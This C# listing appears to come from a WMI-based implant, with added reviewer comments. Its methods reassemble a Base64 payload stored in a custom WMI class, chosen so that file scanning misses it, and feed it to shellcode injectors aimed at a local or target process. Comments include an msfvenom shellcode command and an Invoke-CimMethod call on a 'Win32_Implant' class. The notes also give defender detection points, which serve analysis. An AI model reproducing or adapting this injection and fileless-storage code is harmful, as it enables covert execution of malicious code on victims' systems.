/// <summary>
/// Reads a stored payload through <c>Misc.QueryWMIFS</c>, decodes the returned bytes as
/// UTF-16LE text, and passes that text to one of two injector types depending on
/// <paramref name="processId"/>.
/// </summary>
/// <param name="processId">
/// Target process id as text. Null or empty selects the <c>InjectShellCode</c> path;
/// otherwise the value must parse as an Int32 and selects <c>InjectShellCodeRemote</c>.
/// </param>
/// <param name="wmiClass">WMI class name, forwarded unchanged to <c>Misc.QueryWMIFS</c>.</param>
/// <param name="fileName">Stored file name, forwarded unchanged to <c>Misc.QueryWMIFS</c>.</param>
/// <remarks>
/// Review notes:
/// - Despite the "B64" suffix, no Base64 decoding happens in this overload; if any is done
///   it is inside <c>Misc.QueryWMIFS</c>, which is not shown here.
/// - <c>Int32.TryParse</c> accepts negative numbers and the cast to UInt32 is unchecked, so
///   a negative string reaches the remote injector as a large unsigned value.
/// - The payload source is a WMI class rather than a file on disk, so file-based scanning
///   does not see it. Baselining the WMI repository for non-default classes and collecting
///   Microsoft-Windows-WMI-Activity events are the relevant visibility points.
/// - What <c>InjectShellCode</c>, <c>InjectShellCodeRemote</c> and <c>Tokens</c> do is
///   defined elsewhere; nothing about the injection technique can be confirmed from here.
/// </remarks>
public static void InjectShellCodeWMIFSB64(String processId, String wmiClass, String fileName)
{
    Byte[] storedBytes = Misc.QueryWMIFS(wmiClass, fileName);
    String payloadText = System.Text.Encoding.Unicode.GetString(storedBytes);

    // No process id supplied: use the non-remote injector type.
    if (String.IsNullOrEmpty(processId))
    {
        using (var localRunner = new InjectShellCode(payloadText))
        {
            localRunner.Execute();
        }
        return;
    }

    Int32 targetPid;
    if (!Int32.TryParse(processId, out targetPid))
    {
        // Non-numeric process id; the message text is kept exactly as the original emits it.
        Console.WriteLine("Unknown Error");
        return;
    }

    // A Tokens instance is held for the duration of Execute() and disposed before the
    // injector, as in the original nesting. Its purpose is not visible here; presumably
    // token or privilege handling. Confirm against the Tokens class.
    using (var remoteRunner = new InjectShellCodeRemote(payloadText, (UInt32)targetPid))
    using (var tokens = new Tokens())
    {
        remoteRunner.Execute();
    }
}
/// <summary>
/// Reassembles a Base64 payload stored in indexed parts in the WMI class <c>WMIFS</c>
/// under <c>\\.\root\cimv2</c>, decodes it, and hands the result to
/// <c>InjectShellCodeRemote</c> for the given process id.
/// </summary>
/// <param name="wmiClass">Not used by this overload; the class name WMIFS is hard-coded in both queries.</param>
/// <param name="fileName">Value matched against the <c>FileName</c> property of the stored parts.</param>
/// <param name="processId">Target process id; cast unchecked to UInt32.</param>
/// <returns>Whatever <c>InjectShellCodeRemote.GetOutput()</c> returns.</returns>
/// <remarks>
/// Review notes:
/// - <paramref name="fileName"/> is concatenated into both WQL strings without escaping,
///   so a quote character in it changes the query text.
/// - Parts are fetched with one query per index, and the number of queries comes from the
///   row count of the first query. Nothing verifies that the indexes are contiguous.
/// - The ManagementObjectSearcher and ManagementObjectCollection instances and the injector
///   object are never disposed in this overload.
/// - This overload never calls <c>Execute()</c>; whether the constructor or
///   <c>GetOutput()</c> performs the injection cannot be determined from this code.
/// - Defender visibility: the stored payload is a non-default class in root\cimv2, which
///   baseline comparison of the WMI repository will surface. The usage comment below also
///   names a WMI class <c>Win32_Implant</c> as the invocation surface.
/// </remarks>
public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId)
{
    //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
    //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}

    // Local WMI connection to root\cimv2 with impersonation-level access.
    ConnectionOptions connection = new ConnectionOptions();
    connection.Impersonation = System.Management.ImpersonationLevel.Impersonate;
    ManagementScope cimv2 = new ManagementScope("\\\\.\\root\\cimv2", connection);
    cimv2.Connect();

    // First query: count how many parts are stored under this file name.
    ObjectQuery countQuery = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
    ManagementObjectSearcher countSearcher = new ManagementObjectSearcher(cimv2, countQuery);
    ManagementObjectCollection countRows = countSearcher.Get();
    int partTotal = countRows.Count;

    // Second stage: fetch each part by index and append its FileStore text in order.
    String EncodedText = "";
    int partIndex = 0;
    while (partIndex < partTotal)
    {
        ObjectQuery partQuery = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + partIndex + "\'");
        ManagementObjectSearcher partSearcher = new ManagementObjectSearcher(cimv2, partQuery);
        ManagementObjectCollection partRows = partSearcher.Get();
        foreach (ManagementObject storedPart in partRows)
        {
            EncodedText += storedPart["FileStore"].ToString();
        }
        partIndex++;
    }

    // Base64 text -> bytes -> UTF-16LE string, which is the form the injector type takes.
    byte[] decodedBytes = System.Convert.FromBase64String(EncodedText);
    String payloadText = System.Text.Encoding.Unicode.GetString(decodedBytes);

    InjectShellCodeRemote remoteRunner = new InjectShellCodeRemote(payloadText, (UInt32)processId);
    return remoteRunner.GetOutput();
}
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
/// <summary>
/// Passes a caller-supplied payload string to one of two injector types, chosen by
/// whether <paramref name="strProcessId"/> is present.
/// </summary>
/// <param name="strProcessId">
/// Target process id as text. Null or empty selects <c>InjectShellCode</c>; a value that
/// parses as Int32 selects <c>InjectShellCodeRemote</c>; anything else prints
/// "Unknown Error" and returns.
/// </param>
/// <param name="shellCodeString">Payload text, forwarded unchanged to the injector constructor.</param>
/// <remarks>
/// Review notes:
/// - <c>Int32.TryParse</c> accepts negative values and the UInt32 cast is unchecked, so a
///   negative id wraps instead of being rejected.
/// - "Unknown Error" is printed for what is in fact a known condition (a non-numeric id).
/// - The <c>Tokens</c> instance is created and disposed around <c>Execute()</c> but never
///   referenced; any effect it has comes from its constructor or Dispose, neither of which
///   is shown. Presumably token or privilege handling. Confirm against the Tokens class.
/// - The injection itself is implemented in <c>InjectShellCode</c> and
///   <c>InjectShellCodeRemote</c>, which are outside this listing.
/// </remarks>
public static void InjectShellCode(String strProcessId, String shellCodeString)
{
    // No process id supplied: use the non-remote injector type.
    if (String.IsNullOrEmpty(strProcessId))
    {
        using (var localRunner = new InjectShellCode(shellCodeString))
        {
            localRunner.Execute();
        }
        return;
    }

    Int32 targetPid;
    if (!Int32.TryParse(strProcessId, out targetPid))
    {
        Console.WriteLine("Unknown Error");
        return;
    }

    // Disposal order matches the original nesting: tokens first, then the injector.
    using (var remoteRunner = new InjectShellCodeRemote(shellCodeString, (UInt32)targetPid))
    using (var tokens = new Tokens())
    {
        remoteRunner.Execute();
    }
}
/// <summary>
/// Constructs an <c>InjectShellCodeRemote</c> for the given payload string and process id
/// and returns its <c>GetOutput()</c> result.
/// </summary>
/// <param name="shellCodeString">Payload text, forwarded unchanged to the constructor.</param>
/// <param name="processId">Target process id; cast unchecked to UInt32, so a negative value wraps.</param>
/// <returns>Whatever <c>InjectShellCodeRemote.GetOutput()</c> returns.</returns>
/// <remarks>
/// Review notes:
/// - Unlike the String-id overload, this one neither calls <c>Execute()</c> nor disposes
///   the injector object, and it does not create a <c>Tokens</c> instance. Whether the
///   constructor or <c>GetOutput()</c> performs the work is not visible here.
/// - The usage comment below shows the method being reached as a WMI method on a class
///   named <c>Win32_Implant</c>. The presence of that class in the WMI repository is the
///   observable artefact of this entry point.
/// </remarks>
public static string InjectShellCode(string shellCodeString, Int32 processId)
{
    //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
    //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
    UInt32 targetPid = (UInt32)processId;
    InjectShellCodeRemote remoteRunner = new InjectShellCodeRemote(shellCodeString, targetPid);
    return remoteRunner.GetOutput();
}